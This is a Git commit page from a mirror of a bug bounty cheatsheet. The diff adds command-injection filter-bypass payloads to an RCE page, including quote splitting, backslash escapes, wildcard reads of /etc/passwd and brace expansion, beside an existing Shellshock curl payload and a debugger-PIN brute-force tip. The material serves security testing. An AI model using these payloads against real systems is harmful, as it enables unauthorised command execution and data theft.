Mirrors/bugbounty-cheatsheet
2
0
Fork 0
mirror of https://github.com/EdOverflow/bugbounty-cheatsheet.git synced 2024-11-21 18:53:01 +00:00
Code Issues Projects Releases Packages Wiki Activity

Update rce.md

Browse source 
Added some bypasses
This commit is contained in:
Kuromatae 2019-10-28 14:54:49 +01:00 committed by GitHub
parent 62b8a6623b
commit 71007f84c8
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
1 changed files with 22 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

23
cheatsheets/rce.md
View file

@ -10,6 +10,27 @@ strіng
If the target is running their application in debug mode you might be able to run commands. If you are running the target locally, you can probably brute-force the debugger PIN. The debugger PIN is always in the following format: `***-***-***`.
**Basic Bypasses**
```
i'''d
i"""d
```
```
\l\s -l\a\h
```
```
cat /e?c/p?ss??
cat /e??/??ss*
```
```
{ls,}
{ls,-a}
```
**Shellshock Bug**
```bash
@ -18,4 +39,4 @@ If the target is running their application in debug mode you might be able to ru
```zsh
curl -H "User-Agent: () { :; }; /bin/eject" http://example.com/
```
```